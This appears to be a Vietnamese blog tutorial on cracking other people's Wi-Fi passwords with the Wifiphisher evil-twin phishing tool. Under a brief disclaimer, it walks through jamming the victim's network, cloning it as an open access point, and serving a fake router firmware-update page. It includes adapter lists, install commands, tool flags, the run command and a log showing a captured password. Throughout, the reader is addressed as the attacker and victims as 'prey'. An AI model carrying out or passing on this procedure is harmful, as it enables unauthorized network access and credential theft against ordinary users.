Bài viết mang mục đích giới thiệu tham khảo , không mang mục đích phá hoại. Hiện nay công nghệ bảo mật của modem wifi cũng được nâng cấp nhiều, tuy nhiên các thiết bị của người dùng thường họ ít quan tâm đến việc cập nhật firmware cho modem của họ. Điều này khiến thiết bị của họ dễ bị tấn công thay đổi cấu hình.v..v Có nhiều cách tấn công mạng wifi , một trong những phương pháp đơn giản nhất là kỹ thuật sử dụng Wifiphisher.

Người tấn công sử dụng Wifiphisher sẽ làm cho bộ định tuyến mục tiêu như đang có vấn đề . Mạng Wi-Fi như bị bị cắt , mục tiêu vẫn có thể nhìn thấy mạng, nhưng mọi nỗ lực kết nối đều thất bại. Các thiết bị khác cũng không thể kết nối với mạng Wifi , không chỉ một thiết bị, mà mọi thiết bị Wi-Fi, đều mất kết nối với mạng Wifi.

Sau đó họ sẽ thấy xuất hiện một mạng Wifi mới có cùng tên với mạng cũ ( Mạng wifi này do hacker tạo ra), nhưng không yêu cầu mật khẩu. Sau khi cố gắng tham gia mạng Wifi được bảo vệ ( của chính họ), họ sẽ đăng nhập vào mạng Wifi mở vì nghĩ rằng bộ định tuyến của họ có vấn đề kỹ thuật nên không cần mật khẩu. Ngay khi họ đăng nhập vào mạng wifi do hacker tạo ra , một trang web có giao diện giống với giao diện của nhà sản xuất bộ định tuyến của họ sẽ được khởi chạy và thông báo cho họ rằng bộ định tuyến của họ cần phải cập nhật firmware quan trọng. Nếu họ không nhập mật khẩu để áp dụng bản cập nhật,thì mạng internet sẽ không hoạt động

Sau khi nhập mật khẩu Wi-Fi , màn hình sẽ thông báo bộ định tuyến khởi động lại và họ sẽ nghĩ răng bộ định tuyến của họ đã được cập nhật firmware an toàn. Sau một vài phút chờ đợi, các thiết bị của họ kết nối lại với mạng.

Như vậy thực tế phương pháp này đơn giản gồm
– Gây nhiễu mạng wifi của đối tượng
– Tạo một mạng Wifi giả giống hệt với mạng Wifi của đối tượng (Evil Twin )
– Tạo một trang web thông báo đối tượng phải cập nhật firmware và yêu cầu nhập mật khẩu để xác thực
– Mật khẩu được gửi đến cho hacker mà đối tượng vẫn nghĩ là mạng của mình được bảo mật an toàn

Dưới đây là cách thực hiện

Bạn cần hai adapter không dây tương thích Kali Linux, hỗ trợ monitor mode và packet injection

​Một số loại Adapter bạn có thể tìm kiếm trên Amazon: Alfa AWUS036NH; Alfa AWUS051NH; TP-LINK TL-WN722N; Alfa AWUS036NEH; Panda PAU05; Alfa AWUS036H; Alfa AWUS036NHA.

Ngoài ra bạn sẽ cần máy tính chạy Kali Linux, và cập nhật apt . Nếu bạn không làm điều này, rất có thể bạn sẽ gặp vấn đề trong quá trình cài đặt Wifiphisher.

Bước 1: Install Wifiphisher
Mở máy tính chạy Kali Linux , mở cửa sổ
gõ apt install wifiphisher để cài đặt Wifiphisher.

install Wifiphisher.

apt install wifiphisher
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages were automatically installed and are no longer required:
 guile-2.0-libs libbind9-160 libdns-export1102 libdns1100 libenca0
 libexempi3 libgdbm5 libgeos-3.7.0 libhunspell-1.6-0 libirs160
 libisc-export169 libisc169 libisccc160 libisccfg160 liblouis16
 liblvm2app2.2 liblvm2cmd2.02 liblwres160 libnfs11 libnftnl7
 libntfs-3g88 libomp5 libopencv-core3.2 libopencv-imgproc3.2 libperl5.26
 libpoppler74 libpoppler80 libprotobuf-lite10 libprotobuf10
 libqgis-analysis2.14.21 libqgis-core2.14.21 libqgis-core2.18.24
 libqgis-gui2.14.21 libqgis-gui2.18.24 libqgis-networkanalysis2.14.21
 libqgis-server2.14.21 libqgispython2.14.21 libradare2-2.9
 libradare2-3.0 libsane-extras libsane-extras-common libtbb2
 libuhd3.12.0 libunbound2 linux-image-4.16.0-kali2-amd64 php7.2-mysql
 python-anyjson python-capstone python-couchdbkit python-http-parser
 python-jwt python-libemu python-pam python-restkit python-socketpool
 x11proto-dri2-dev x11proto-gl-dev
Use 'apt autoremove' to remove them.
The following additional packages will be installed:
 python-pbkdf2 python-pyric python-roguehostapd
Suggested packages:
 python-pyric-doc
The following NEW packages will be installed:
 python-pbkdf2 python-pyric python-roguehostapd wifiphisher
0 upgraded, 4 newly installed, 0 to remove and 422 not upgraded.
Need to get 4,579 kB of archives.
After this operation, 10.8 MB of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 http://mirrors.ocf.berkeley.edu/kali kali-rolling/main amd64 python-pbkdf2 all 1.3+20110613.git2a0fb15~ds0-3 [7,398 B]
Get:2 http://mirrors.ocf.berkeley.edu/kali kali-rolling/main amd64 python-pyric all 0.1.6-0kali1 [308 kB]
Get:3 http://mirrors.ocf.berkeley.edu/kali kali-rolling/main amd64 python-roguehostapd amd64 1.2.3-0kali2 [402 kB]
Get:4 http://mirrors.ocf.berkeley.edu/kali kali-rolling/main amd64 wifiphisher all 1.4+git20180525-0kali2 [3,862 kB]
Fetched 4,579 kB in 10s (458 kB/s)
Selecting previously unselected package python-pbkdf2.
(Reading database ... 431969 files and directories currently installed.)
Preparing to unpack .../python-pbkdf2_1.3+20110613.git2a0fb15~ds0-3_all.deb ...
Unpacking python-pbkdf2 (1.3+20110613.git2a0fb15~ds0-3) ...
Selecting previously unselected package python-pyric.
Preparing to unpack .../python-pyric_0.1.6-0kali1_all.deb ...
Unpacking python-pyric (0.1.6-0kali1) ...
Selecting previously unselected package python-roguehostapd.
Preparing to unpack .../python-roguehostapd_1.2.3-0kali2_amd64.deb ...
Unpacking python-roguehostapd (1.2.3-0kali2) ...
Selecting previously unselected package wifiphisher.
Preparing to unpack .../wifiphisher_1.4+git20180525-0kali2_all.deb ...
Unpacking wifiphisher (1.4+git20180525-0kali2) ...
Setting up python-roguehostapd (1.2.3-0kali2) ...
Setting up python-pbkdf2 (1.3+20110613.git2a0fb15~ds0-3) ...
Setting up python-pyric (0.1.6-0kali1) ...
Setting up wifiphisher (1.4+git20180525-0kali2) ...

Progress: [ 95%] [#######################################################...]

Bạn có thể cài repo GitHub, làm theo hướng dẫn trên trang GitHub, như sau:

git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
sudo python setup.py install

Bước 2: Tìm hiểu Wifiphisher’s Flags
Bạn có thể gõ lệnh sudo wifiphisher gõ –help để xem các câu lệnh và chức năng của Wifiphisher

wifiphisher --help
NDSHAKE_CAPTURE
            Capture of the WPA/WPA2 handshakes for verifying
            passphraseExample : -hC capture.pcap
 -qS, --quitonsuccess Stop the script after successfully retrieving one pair
            of credentials
 -lC, --lure10-capture
            Capture the BSSIDs of the APs that are discovered
            during AP selection phase. This option is part of
            Lure10 attack.
 -lE LURE10_EXPLOIT, --lure10-exploit LURE10_EXPLOIT
            Fool the Windows Location Service of nearby Windows
            users to believe it is within an area that was
            previously captured with --lure10-capture. Part of the
            Lure10 attack.
 --logging       Log activity to file
 -dK, --disable-karma Disables KARMA attack
 -lP LOGPATH, --logpath LOGPATH
            Determine the full path of the logfile.
 -cP CREDENTIAL_LOG_PATH, --credential-log-path CREDENTIAL_LOG_PATH
            Determine the full path of the file that will store
            any captured credentials
 --payload-path PAYLOAD_PATH
            Payload path for scenarios serving a payload
 -cM, --channel-monitor
            Monitor if target access point changes the channel.
 -wP, --wps-pbc    Monitor if the button on a WPS-PBC Registrar is
            pressed.
 -wAI WPSPBC_ASSOC_INTERFACE, --wpspbc-assoc-interface WPSPBC_ASSOC_INTERFACE
            The WLAN interface used for associating to the WPS
            AccessPoint.
 -kB, --known-beacons Broadcast a number of beacon frames advertising
            popular WLANs
 -fH, --force-hostapd Force the usage of hostapd installed in the system
 -pPD PHISHING_PAGES_DIRECTORY, --phishing-pages-directory PHISHING_PAGES_DIRECTORY
            Search for phishing pages in this location
 --dnsmasq-conf DNSMASQ_CONF
            Determine the full path of a custom dnmasq.conf file
 -pE PHISHING_ESSID, --phishing-essid PHISHING_ESSID
            Determine the ESSID you want to use for the phishing
            page

ước 3: Cắm Wireless Network Adapter

Cắm Wireless Network Adapter vào máy tính , dùng Wifiphisher để bắt đầu quá trình thực hiện phisher

Bước 4: Chạy đoạn Script

Ở đây bạn có thể dùng các trình thông dịch để chạy script
Với loại USB wireless bạn sẽ cần gõ thêm -i
Để chạy đoạn script bạn gõ lệnh sau

sudo wifiphisher -i wlan1

Sau khi chạy đoạn script bạn sẽ thấy một trang hiển thị thông tin tất cả mạng wifi gần đó. Bạn có thể chọn mạng nào mà bạn muốn tấn công và nhấn Enter.

Chọn tùy chọn số 2

Cuộc tấn công ngay lập tức được bắt đầu, Wifiphisher cũng dò các thiết bị đang cố gắng kết nối với các mạng không , nó sẽ tạo các phiên bản đăng nhập giả để thu hút các thiết bị kết nối.

Sau khi mục tiêu đã dính mồi, một cửa sổ bật lên sẽ yêu cầu họ nhập mật khẩu.

Khi con mồi nhập mật khẩu, Hacker sẽ được thông báo trong màn hình Wifiphisher.

[*] Starting Wifiphisher 1.4GIT ( https://wifiphisher.org ) at 2019-02-04 08:10
[+] Timezone detected. Setting channel range to 1-13
[+] Selecting wfphshr-wlan0 interface for the deauthentication attack
[+] Selecting wlan1 interface for creating the rogue Access Point
[+] Changing wlan1 MAC addr (BSSID) to 00:00:00:31:8c:e5
[!] The MAC address could not be set. (Tried 00:00:00:ee:5c:95)
[+] Sending SIGKILL to wpa_supplicant
[+] Sending SIGKILL to dhclient
[+] Sending SIGKILL to dhclient
[+] Sending SIGKILL to NetworkManager
[*] Cleared leases, started DHCP, set up iptables
[+] Selecting Firmware Upgrade Page template
[*] Starting the fake access point...
[*] Starting HTTP/HTTPS server at ports 8080, 443
[+] Show your support!
[+] Follow us: https://twitter.com/wifiphisher
[+] Like us: https://www.facebook.com/Wifiphisher
[+] Captured credentials:
wfphshr-wpa-password=myfatpassword
[!] Closing

Đoạn script đóng và gửi mật khẩu mạng Wifi bị tấn công cho bạn

Còn đây là màn hình của con mồi

0 0 votes
Đánh giá bài viết
Tiên Viết
Mình là Tiên. 9 tuổi, mê công nghệ từ nhỏ đến giờ vẫn còn mê. Sau nhiều năm tìm hiểu, học hỏi giờ đã trở thành "Thợ cài win dạo". Với kinh nghiệm cài win dạo nhiều năm mình lập blog này để chém gió tào lao về công nghệ thông tin.
Theo dõi
Thông báo về
guest

0 Comments
Inline Feedbacks
View all comments